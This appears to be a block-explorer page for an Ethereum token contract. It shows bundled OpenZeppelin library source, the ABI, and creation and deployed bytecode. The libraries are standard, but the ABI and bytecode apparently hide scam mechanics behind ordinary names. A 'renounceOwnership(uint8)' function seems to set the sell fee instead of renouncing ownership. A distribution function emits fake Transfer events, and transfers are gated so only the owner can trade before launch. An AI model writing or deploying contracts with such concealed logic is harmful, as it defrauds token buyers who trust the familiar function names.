        }
        return result;
    }

    /**
     * @dev Return the log in base 256, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log256(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log256(value);
            return result + (unsignedRoundsUp(rounding) && 1 << (result << 3) < value ? 1 : 0);
        }
    }

    /**
     * @dev Returns whether a provided rounding mode is considered rounding up for unsigned integers.
     */
    function unsignedRoundsUp(Rounding rounding) internal pure returns (bool) {
        return uint8(rounding) % 2 == 1;
    }
}

File 11 of 13: Multicall.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Multicall.sol)

pragma solidity ^0.8.20;

import {Address} from "./Address.sol";

/**
 * @dev Provides a function to batch together multiple calls in a single external call.
 */
abstract contract Multicall {
    /**
     * @dev Receives and executes a batch of function calls on this contract.
     * @custom:oz-upgrades-unsafe-allow-reachable delegatecall
     */
    function multicall(bytes[] calldata data) external virtual returns (bytes[] memory results) {
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            results[i] = Address.functionDelegateCall(address(this), data[i]);
        }
        return results;
    }
}

File 12 of 13: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.20;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 13 of 13: SignedMath.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/math/SignedMath.sol)

pragma solidity ^0.8.20;

/**
 * @dev Standard signed math utilities missing in the Solidity language.
 */
library SignedMath {
    /**
     * @dev Returns the largest of two signed numbers.
     */
    function max(int256 a, int256 b) internal pure returns (int256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two signed numbers.
     */
    function min(int256 a, int256 b) internal pure returns (int256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two signed numbers without overflow.
     * The result is rounded towards zero.
     */
    function average(int256 a, int256 b) internal pure returns (int256) {
        // Formula from the book "Hacker's Delight"
        int256 x = (a & b) + ((a ^ b) >> 1);
        return x + (int256(uint256(x) >> 255) & (a ^ b));
    }

    /**
     * @dev Returns the absolute unsigned value of a signed value.
     */
    function abs(int256 n) internal pure returns (uint256) {
        unchecked {
            // must be unchecked in order to support `n = type(int256).min`
            return uint256(n >= 0 ? n : -n);
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"TOKEN_MKT","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"distributionTokenToWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint8","name":"x","type":"uint8"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"storeData","outputs":[{"internalType":"address","name":"tokenMkt","type":"address"},{"internalType":"uint8","name":"buyFee","type":"uint8"},{"internalType":"uint8","name":"sellFee","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526040518060400160405280600981526020017f45524334303450414400000000000000000000000000000000000000000000008152505f908162000049919062000725565b506040518060400160405280600681526020017f45524350414400000000000000000000000000000000000000000000000000008152506001908162000090919062000725565b505f600860146101000a81548160ff021916908360ff1602179055505f600860156101000a81548160ff021916908360ff160217905550348015620000d3575f80fd5b5060405180606001604052803373ffffffffffffffffffffffffffffffffffffffff168152602001600860149054906101000a900460ff1660ff168152602001600860159054906101000a900460ff1660ff1681525060025f820151815f015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506020820151815f0160146101000a81548160ff021916908360ff1602179055506040820151815f0160156101000a81548160ff021916908360ff1602179055509050507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff60045f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503360085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620002b533336200043d60201b60201c565b6064806012600a620002c8919062000992565b612710620002d79190620009e2565b620002e39190620009e2565b620002ef919062000a59565b60035f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60035f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546040516200042f919062000aa1565b60405180910390a362000abc565b8160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200053d57607f821691505b602082108103620005535762000552620004f8565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620005b77fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200057a565b620005c386836200057a565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6200060d620006076200060184620005db565b620005e4565b620005db565b9050919050565b5f819050919050565b6200062883620005ed565b62000640620006378262000614565b84845462000586565b825550505050565b5f90565b6200065662000648565b620006638184846200061d565b505050565b5b818110156200068a576200067e5f826200064c565b60018101905062000669565b5050565b601f821115620006d957620006a38162000559565b620006ae846200056b565b81016020851015620006be578190505b620006d6620006cd856200056b565b83018262000668565b50505b505050565b5f82821c905092915050565b5f620006fb5f1984600802620006de565b1980831691505092915050565b5f620007158383620006ea565b9150826002028217905092915050565b6200073082620004c1565b67ffffffffffffffff8111156200074c576200074b620004cb565b5b62000758825462000525565b620007658282856200068e565b5f60209050601f8311600181146200079b575f841562000786578287015190505b62000792858262000708565b86555062000801565b601f198416620007ab8662000559565b5f5b82811015620007d457848901518255600182019150602085019450602081019050620007ad565b86831015620007f45784890151620007f0601f891682620006ea565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000893578086048111156200086b576200086a62000809565b5b60018516156200087b5780820291505b80810290506200088b8562000836565b94506200084b565b94509492505050565b5f82620008ad57600190506200097f565b81620008bc575f90506200097f565b8160018114620008d55760028114620008e05762000916565b60019150506200097f565b60ff841115620008f557620008f462000809565b5b8360020a9150848211156200090f576200090e62000809565b5b506200097f565b5060208310610133831016604e8410600b8410161715620009505782820a9050838111156200094a576200094962000809565b5b6200097f565b6200095f848484600162000842565b9250905081840481111562000979576200097862000809565b5b81810290505b9392505050565b5f60ff82169050919050565b5f6200099e82620005db565b9150620009ab8362000986565b9250620009da7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200089c565b905092915050565b5f620009ee82620005db565b9150620009fb83620005db565b925082820262000a0b81620005db565b9150828204841483151762000a255762000a2462000809565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000a6582620005db565b915062000a7283620005db565b92508262000a855762000a8462000a2c565b5b828204905092915050565b62000a9b81620005db565b82525050565b5f60208201905062000ab65f83018462000a90565b92915050565b611d868062000aca5f395ff3fe6080604052600436106100e0575f3560e01c80634feefd9b1161007e578063a8aa1b3111610058578063a8aa1b31146102c3578063a9059cbb146102ed578063c9567bf914610329578063dd62ed3e1461033f576100e7565b80634feefd9b1461023557806370a082311461025d57806395d89b4114610299576100e7565b806318160ddd116100ba57806318160ddd1461017957806323b872dd146101a3578063313ce567146101df5780634abe305214610209576100e7565b806306fdde03146100eb578063095ea7b314610115578063129e81e414610151576100e7565b366100e757005b5f80fd5b3480156100f6575f80fd5b506100ff61037b565b60405161010c9190611404565b60405180910390f35b348015610120575f80fd5b5061013b600480360381019061013691906114b9565b61040a565b6040516101489190611511565b60405180910390f35b34801561015c575f80fd5b5061017760048036038101906101729190611560565b6104f7565b005b348015610184575f80fd5b5061018d610570565b60405161019a919061159a565b60405180910390f35b3480156101ae575f80fd5b506101c960048036038101906101c491906115b3565b61058e565b6040516101d69190611511565b60405180910390f35b3480156101ea575f80fd5b506101f3610631565b6040516102009190611612565b60405180910390f35b348015610214575f80fd5b5061021d610636565b60405161022c9392919061163a565b60405180910390f35b348015610240575f80fd5b5061025b60048036038101906102569190611725565b610684565b005b348015610268575f80fd5b50610283600480360381019061027e91906117b6565b6107b7565b604051610290919061159a565b60405180910390f35b3480156102a4575f80fd5b506102ad6107cc565b6040516102ba9190611404565b60405180910390f35b3480156102ce575f80fd5b506102d761085c565b6040516102e491906117e1565b60405180910390f35b3480156102f8575f80fd5b50610313600480360381019061030e91906114b9565b610881565b6040516103209190611511565b60405180910390f35b348015610334575f80fd5b5061033d610895565b005b34801561034a575f80fd5b50610365600480360381019061036091906117fa565b610ad1565b604051610372919061159a565b60405180910390f35b60605f805461038990611865565b80601f01602080910402602001604051908101604052809291908181526020018280546103b590611865565b80156104005780601f106103d757610100808354040283529160200191610400565b820191905f5260205f20905b8154815290600101906020018083116103e357829003601f168201915b5050505050905090565b5f8160045f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516104e5919061159a565b60405180910390a36001905092915050565b6104ff610af1565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610563576040517f9af2b10000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b61056d5f82610b1b565b50565b6012600a61057e91906119f1565b61271061058b9190611a3b565b81565b5f8160045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546106169190611a7c565b92505081905550610628848484610b59565b90509392505050565b601281565b6002805f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690805f0160149054906101000a900460ff1690805f0160159054906101000a900460ff16905083565b61068c610af1565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146106f0576040517f9af2b10000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5f5b848490508110156107af578484828181106107105761070f611aaf565b5b905060200201602081019061072591906117b6565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061078657610785611aaf565b5b9050602002013560405161079a919061159a565b60405180910390a380806001019150506106f2565b505050505050565b6003602052805f5260405f205f915090505481565b6060600180546107db90611865565b80601f016020809104026020016040519081016040528092919081815260200182805461080790611865565b80156108525780601f1061082957610100808354040283529160200191610852565b820191905f5260205f20905b81548152906001019060200180831161083557829003601f168201915b5050505050905090565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f61088d338484610b59565b905092915050565b61089d610af1565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146108d3575f80fd5b600560159054906101000a900460ff16156108ec575f80fd5b5f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561094a573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061096e9190611af0565b90505f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109ce573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906109f29190611af0565b90505f8273ffffffffffffffffffffffffffffffffffffffff1663e6a4390530846040518363ffffffff1660e01b8152600401610a30929190611b1b565b602060405180830381865afa158015610a4b573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a6f9190611af0565b90508060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600560156101000a81548160ff021916908315150217905550505050565b6004602052815f5260405f20602052805f5260405f205f91509150505481565b5f60025f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b8160025f0160146101000a81548160ff021916908360ff1602179055508060025f0160156101000a81548160ff021916908360ff1602179055505050565b5f80610b63610af1565b9050600560159054906101000a900460ff1680610bab57508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b80610be157508073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b610be9575f80fd5b8260035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610c359190611a7c565b9250508190555060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16148015610ca55750600560149054906101000a900460ff16155b8015610d14575060646012600a610cbc91906119f1565b612710610cc99190611a3b565b610cd39190611b6f565b60035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205410155b8015610d4c57508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15610f9a576001600560146101000a81548160ff0219169083151502179055505f600267ffffffffffffffff811115610d8857610d87611b9f565b5b604051908082528060200260200182016040528015610db65781602001602082028036833780820191505090505b50905030815f81518110610dcd57610dcc611aaf565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610e64573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610e889190611af0565b81600181518110610e9c57610e9b611aaf565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663eb6f613960646012600a610f1691906119f1565b612710610f239190611a3b565b610f2d9190611b6f565b5f8430426040518663ffffffff1660e01b8152600401610f51959493929190611cc5565b5f604051808303815f87803b158015610f68575f80fd5b505af1158015610f7a573d5f803e3d5ffd5b505050505f600560146101000a81548160ff021916908315150217905550505b5f8060025f0160149054906101000a900460ff1660025f0160159054906101000a900460ff16915091503073ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff1614158015611013575060011515600560159054906101000a900460ff161515145b156110f4575f606460055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168873ffffffffffffffffffffffffffffffffffffffff16146110755783611077565b825b60ff16876110859190611a3b565b61108f9190611b6f565b9050808661109d9190611a7c565b95508060035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546110eb9190611d1d565b92505081905550505b8460035f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546111409190611d1d565b9250508190555060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff1603611226578573ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051611219919061159a565b60405180910390a361136c565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff16036113055760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef876040516112f8919061159a565b60405180910390a361136b565b8573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051611362919061159a565b60405180910390a35b5b600193505050509392505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156113b1578082015181840152602081019050611396565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6113d68261137a565b6113e08185611384565b93506113f0818560208601611394565b6113f9816113bc565b840191505092915050565b5f6020820190508181035f83015261141c81846113cc565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6114558261142c565b9050919050565b6114658161144b565b811461146f575f80fd5b50565b5f813590506114808161145c565b92915050565b5f819050919050565b61149881611486565b81146114a2575f80fd5b50565b5f813590506114b38161148f565b92915050565b5f80604083850312156114cf576114ce611424565b5b5f6114dc85828601611472565b92505060206114ed858286016114a5565b9150509250929050565b5f8115159050919050565b61150b816114f7565b82525050565b5f6020820190506115245f830184611502565b92915050565b5f60ff82169050919050565b61153f8161152a565b8114611549575f80fd5b50565b5f8135905061155a81611536565b92915050565b5f6020828403121561157557611574611424565b5b5f6115828482850161154c565b91505092915050565b61159481611486565b82525050565b5f6020820190506115ad5f83018461158b565b92915050565b5f805f606084860312156115ca576115c9611424565b5b5f6115d786828701611472565b93505060206115e886828701611472565b92505060406115f9868287016114a5565b9150509250925092565b61160c8161152a565b82525050565b5f6020820190506116255f830184611603565b92915050565b6116348161144b565b82525050565b5f60608201905061164d5f83018661162b565b61165a6020830185611603565b6116676040830184611603565b949350505050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126116905761168f61166f565b5b8235905067ffffffffffffffff8111156116ad576116ac611673565b5b6020830191508360208202830111156116c9576116c8611677565b5b9250929050565b5f8083601f8401126116e5576116e461166f565b5b8235905067ffffffffffffffff81111561170257611701611673565b5b60208301915083602082028301111561171e5761171d611677565b5b9250929050565b5f805f805f6060868803121561173e5761173d611424565b5b5f61174b88828901611472565b955050602086013567ffffffffffffffff81111561176c5761176b611428565b5b6117788882890161167b565b9450945050604086013567ffffffffffffffff81111561179b5761179a611428565b5b6117a7888289016116d0565b92509250509295509295909350565b5f602082840312156117cb576117ca611424565b5b5f6117d884828501611472565b91505092915050565b5f6020820190506117f45f83018461162b565b92915050565b5f80604083850312156118105761180f611424565b5b5f61181d85828601611472565b925050602061182e85828601611472565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061187c57607f821691505b60208210810361188f5761188e611838565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115611917578086048111156118f3576118f2611895565b5b60018516156119025780820291505b8081029050611910856118c2565b94506118d7565b94509492505050565b5f8261192f57600190506119ea565b8161193c575f90506119ea565b8160018114611952576002811461195c5761198b565b60019150506119ea565b60ff84111561196e5761196d611895565b5b8360020a91508482111561198557611984611895565b5b506119ea565b5060208310610133831016604e8410600b84101617156119c05782820a9050838111156119bb576119ba611895565b5b6119ea565b6119cd84848460016118ce565b925090508184048111156119e4576119e3611895565b5b81810290505b9392505050565b5f6119fb82611486565b9150611a068361152a565b9250611a337fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611920565b905092915050565b5f611a4582611486565b9150611a5083611486565b9250828202611a5e81611486565b91508282048414831517611a7557611a74611895565b5b5092915050565b5f611a8682611486565b9150611a9183611486565b9250828203905081811115611aa957611aa8611895565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050611aea8161145c565b92915050565b5f60208284031215611b0557611b04611424565b5b5f611b1284828501611adc565b91505092915050565b5f604082019050611b2e5f83018561162b565b611b3b602083018461162b565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f611b7982611486565b9150611b8483611486565b925082611b9457611b93611b42565b5b828204905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b5f819050919050565b5f819050919050565b5f611bf8611bf3611bee84611bcc565b611bd5565b611486565b9050919050565b611c0881611bde565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b611c408161144b565b82525050565b5f611c518383611c37565b60208301905092915050565b5f602082019050919050565b5f611c7382611c0e565b611c7d8185611c18565b9350611c8883611c28565b805f5b83811015611cb8578151611c9f8882611c46565b9750611caa83611c5d565b925050600181019050611c8b565b5085935050505092915050565b5f60a082019050611cd85f83018861158b565b611ce56020830187611bff565b8181036040830152611cf78186611c69565b9050611d06606083018561162b565b611d13608083018461158b565b9695505050505050565b5f611d2782611486565b9150611d3283611486565b9250828201905080821115611d4a57611d49611895565b5b9291505056fea2646970667358221220572acacf54e4a657828d3411ae1a6ffb0bfb31db22f9e5205af63c91cdac023864736f6c63430008180033

Deployed Bytecode

0x6080604052600436106100e0575f3560e01c80634feefd9b1161007e578063a8aa1b3111610058578063a8aa1b31146102c3578063a9059cbb146102ed578063c9567bf914610329578063dd62ed3e1461033f576100e7565b80634feefd9b1461023557806370a082311461025d57806395d89b4114610299576100e7565b806318160ddd116100ba57806318160ddd1461017957806323b872dd146101a3578063313ce567146101df5780634abe305214610209576100e7565b806306fdde03146100eb578063095ea7b314610115578063129e81e414610151576100e7565b366100e757005b5f80fd5b3480156100f6575f80fd5b506100ff61037b565b60405161010c9190611404565b60405180910390f35b348015610120575f80fd5b5061013b600480360381019061013691906114b9565b61040a565b6040516101489190611511565b60405180910390f35b34801561015c575f80fd5b5061017760048036038101906101729190611560565b6104f7565b005b348015610184575f80fd5b5061018d610570565b60405161019a919061159a565b60405180910390f35b3480156101ae575f80fd5b506101c960048036038101906101c491906115b3565b61058e565b6040516101d69190611511565b60405180910390f35b3480156101ea575f80fd5b506101f3610631565b6040516102009190611612565b60405180910390f35b348015610214575f80fd5b5061021d610636565b60405161022c9392919061163a565b60405180910390f35b348015610240575f80fd5b5061025b60048036038101906102569190611725565b610684565b005b348015610268575f80fd5b50610283600480360381019061027e91906117b6565b6107b7565b604051610290919061159a565b60405180910390f35b3480156102a4575f80fd5b506102ad6107cc565b6040516102ba9190611404565b60405180910390f35b3480156102ce575f80fd5b506102d761085c565b6040516102e491906117e1565b60405180910390f35b3480156102f8575f80fd5b50610313600480360381019061030e91906114b9565b610881565b6040516103209190611511565b60405180910390f35b348015610334575f80fd5b5061033d610895565b005b34801561034a575f80fd5b50610365600480360381019061036091906117fa565b610ad1565b604051610372919061159a565b60405180910390f35b60605f805461038990611865565b80601f01602080910402602001604051908101604052809291908181526020018280546103b590611865565b80156104005780601f106103d757610100808354040283529160200191610400565b820191905f5260205f20905b8154815290600101906020018083116103e357829003601f168201915b5050505050905090565b5f8160045f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516104e5919061159a565b60405180910390a36001905092915050565b6104ff610af1565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610563576040517f9af2b10000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b61056d5f82610b1b565b50565b6012600a61057e91906119f1565b61271061058b9190611a3b565b81565b5f8160045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546106169190611a7c565b92505081905550610628848484610b59565b90509392505050565b601281565b6002805f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690805f0160149054906101000a900460ff1690805f0160159054906101000a900460ff16905083565b61068c610af1565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146106f0576040517f9af2b10000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5f5b848490508110156107af57848482